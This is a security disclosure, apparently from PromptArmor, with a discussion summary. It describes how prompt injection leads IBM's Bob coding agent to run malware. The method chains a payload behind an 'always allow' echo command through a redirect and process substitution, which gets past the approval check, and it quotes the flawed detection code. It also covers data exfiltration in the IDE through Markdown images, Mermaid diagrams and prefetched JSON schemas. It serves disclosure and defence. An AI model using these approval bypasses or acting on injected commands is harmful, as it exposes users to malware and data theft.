IBM AI ('Bob') Downloads and Executes Malware

Original link: https://www.promptarmor.com/resources/ibm-ai-(-bob-)-downloads-and-executes-malware

## Summary: IBM Bob Coding Agent Vulnerabilities

IBM Bob, IBM's AI coding agent currently in closed beta, contains serious security vulnerabilities. Researchers found that the Bob CLI is susceptible to prompt injection attacks that can execute malware without user consent if 'always allow' has been enabled for any command (a setting IBM itself labels 'high risk').

Specifically, attackers can bypass the safety checks by chaining commands with the redirect operator (>) or process substitution (>(command)), tricking the system into auto-approving a malicious payload after a benign command has been pre-approved. This allows attackers to install ransomware, steal credentials, or take full control of the user's machine.

The Bob IDE also exhibits vulnerabilities common to AI applications, including data exfiltration through rendered Markdown images and Mermaid diagrams (which log requests to attacker-controlled endpoints) and prefetching of JSON schemas from potentially malicious URLs. These findings highlight significant risks ahead of IBM Bob's public release and underscore the need for robust security improvements to protect users.

## IBM's 'Bob' AI Is Vulnerable to Malware Downloads

A recent test by PromptArmor demonstrates that IBM's new AI coding agent 'Bob' (currently in closed beta) can be tricked via prompt injection into downloading and executing malware. The flaw resembles one previously found in Google's Antigravity, which was addressed with a 'secure mode'.

Commenters note that this is unsurprising for beta software, and argue that such AI tools *may* ultimately improve security by reducing dangerous copy-pasting of code. Concerns remain about the broader implications of AI-assisted coding, however, including problems of scale and liability for the code itself.

Discussion centered on the lack of a disclosure timeline with IBM, the difficulty of constraining non-deterministic LLM behavior, and the importance of strong permission boundaries. Many suggested blocking code execution until it has been reviewed, or running agents in sandboxed environments. One recurring issue is the failure to parse commands correctly, which blurs the line between data and logic in AI systems. The consensus leans toward cautious adoption and stronger safeguards as AI coding tools mature.

Original Article

A vulnerability has been identified that allows malicious actors to exploit IBM Bob to download and execute malware without human approval if the user configures ‘always allow’ for any command.

IBM Bob is IBM’s new coding agent, currently in Closed Beta. IBM Bob is offered through the Bob CLI (a terminal-based coding agent like Claude Code or OpenAI Codex) and the Bob IDE (an AI-powered editor similar to Cursor).

In this article, we demonstrate that the Bob CLI is vulnerable to prompt injection attacks resulting in malware execution, and the Bob IDE is vulnerable to known AI-specific data exfiltration vectors. 

In the documentation, IBM warns that setting auto-approve for commands constitutes a 'high risk' that can 'potentially execute harmful operations' - with the recommendation that users leverage whitelists and avoid wildcards. We have opted to disclose this work publicly to ensure users are informed of the acute risks of using the system prior to its full release. We hope that further protections will be in place to remediate these risks for IBM Bob's General Access release.

  • The user wants to explore a new repository - they ask Bob for help.

  • Bob prompts the user several times with benign ‘echo’ commands; after the third time, the user selects ‘always allow’ for execution of ‘echo’.

  • Bob attempts to ‘test’ the user as part of the training by offering a dangerous command. However, the command has been specially crafted to bypass built-in defenses, so it executes immediately, installing and running a script retrieved from an attacker’s server.

  • When a multi-part command is requested (using operators like ‘;’), the user is shown a request that asks for permission to run each sub-command.

    Note, this modal says: ‘Allow execution of echo, cat’.

    This is bypassed because the defense system fails to identify separate sub-commands when they are chained using a redirect operator (>).

    Note, this modal only mentions: ‘Allow execution of echo’.
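The redirect bypass can be sketched as follows. This is hypothetical illustrative code, not Bob's actual implementation: a splitter that recognizes ';', '&&', '||' and '|' as separators, but not '>', reports a redirect-chained payload as a single 'echo' command.

```javascript
// Hypothetical sketch (not Bob's actual code) of a sub-command splitter
// that recognizes the common chaining operators but not redirects.
// A real parser would also have to handle quoting and escaping.
function splitSubCommands(cmd) {
  return cmd
    .split(/;|&&|\|\||\|/)        // split on ';', '&&', '||', '|'
    .map((part) => part.trim())
    .filter((part) => part.length > 0);
}

// Chained with ';': both sub-commands are surfaced for approval.
console.log(splitSubCommands("echo hi; cat secrets.txt"));
// → [ 'echo hi', 'cat secrets.txt' ]

// Chained via a redirect into a process substitution: the splitter
// reports one command whose first word is the pre-approved 'echo'.
console.log(splitSubCommands("echo payload > >(sh)"));
// → [ 'echo payload > >(sh)' ]
```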

  • Bob prohibits the use of command substitution like $(command) as a security measure. 

    However, even though the security message says it's restricted, the underlying code fails to adequately restrict evaluation via process substitution: >(command).

    This allows for the output of the malicious sub-command that retrieves the malware to be used as the input for the sub-command to execute that malware. 

    One can examine where the defense should have been in the minified JS source code:

    function detectCommandSubstitution(cmd) {
      ...
      if (
        ...
        (ch === "$" && nxt === "(") ||
        (ch === "<" && nxt === "(" ... && !inBacktick) ||
        (ch === "`" && !inBacktick)
        ...
      ) {
        return true;
      }
      ...
      return false;
    }
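De-minified and with the gap filled in, the scanner would look something like the following reconstruction (ours, not IBM's; the quoting and state tracking elided above is also omitted here). The final branch, '>' followed by '(', is the process-substitution check the shipped code lacks:

```javascript
// Reconstruction for illustration (not IBM's actual code): a character
// scanner that flags shell substitution syntax. The final branch is the
// '>(command)' process-substitution check missing from the minified source.
function detectCommandSubstitution(cmd) {
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    const nxt = cmd[i + 1];
    if (
      (ch === "$" && nxt === "(") || // $(command)
      (ch === "<" && nxt === "(") || // <(command)
      ch === "`" ||                  // `command`
      (ch === ">" && nxt === "(")    // >(command): the missing check
    ) {
      return true;
    }
  }
  return false;
}
```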
  • By prefixing the malicious command with a benign ‘echo’, for which the user has selected ‘always allow’, the user inadvertently auto-approves the entire malicious payload (since the redirect and process-substitution bypasses prevent the payload from being recognized as separate sub-commands). 
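The interaction with the 'always allow' list can be sketched like this (hypothetical code; the set contents and function names are ours): once the bypasses collapse the chained payload into one apparent sub-command, an approval check that keys off the first word sees only the allowlisted 'echo'.

```javascript
// Hypothetical sketch of the approval step. After the redirect and
// process-substitution bypasses, the entire payload is treated as one
// sub-command, so only its first word is compared against the allowlist.
const alwaysAllowed = new Set(["echo"]); // filled in when the user picks 'always allow'

function isAutoApproved(cmd) {
  const firstWord = cmd.trim().split(/\s+/)[0];
  return alwaysAllowed.has(firstWord);
}

// The benign prefix makes the whole malicious payload auto-approved:
console.log(isAutoApproved("echo training > >(sh)")); // → true
```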

  • With the ability to deliver an arbitrary shell script payload to the victim, attackers can leverage known (or custom) malware variants to conduct cyber attacks such as:

  • Executing ransomware that encrypts or deletes files

  • Credential theft or spyware deployment

  • Device takeover (opening a reverse shell)

  • Forcing the victim into a cryptocurrency-mining botnet

  • Together, these outcomes demonstrate how a prompt injection can escalate into a full-scale compromise of a user’s machine through vulnerabilities in the IBM Bob CLI.

    Additional findings indicate that the Bob IDE is susceptible to several known zero-click data exfiltration vectors that affect many AI applications:

  • Markdown images are rendered in model outputs, with a Content Security Policy that allows requests to endpoints that can be logged by attackers (storage.googleapis.com).
    Here is an interesting spin on the typical Markdown image attack: beyond exfiltrating data through query parameters as the image is rendered, the image itself is hyperlinked and styled to pose as a button, turning it into a phishing lure.
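A payload of this shape (all URLs and parameter names here are invented for illustration) combines both tricks: the image fetch leaks data through the query string, and the surrounding link turns the rendered image into a clickable phishing 'button':

```markdown
[![Continue setup](https://storage.googleapis.com/attacker-bucket/button.png?leak=BASE64_ENCODED_SECRETS)](https://attacker.example/phish)
```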

  • Mermaid diagrams supporting external images are rendered in model outputs, with a Content Security Policy that allows requests to endpoints that can be logged by attackers (storage.googleapis.com).

  • JSON schemas are pre-fetched, which can yield data exfiltration if a dynamically generated attacker-controlled URL is provided in the field (this can happen before a file edit is accepted). 
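For instance, a proposed file edit along these lines (URL invented for illustration) would cause the IDE to fetch the schema, and with it any data encoded into the URL, before the user has accepted the edit:

```json
{
  "$schema": "https://attacker.example/schemas/BASE64_ENCODED_SECRETS.json",
  "name": "innocuous-config"
}
```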
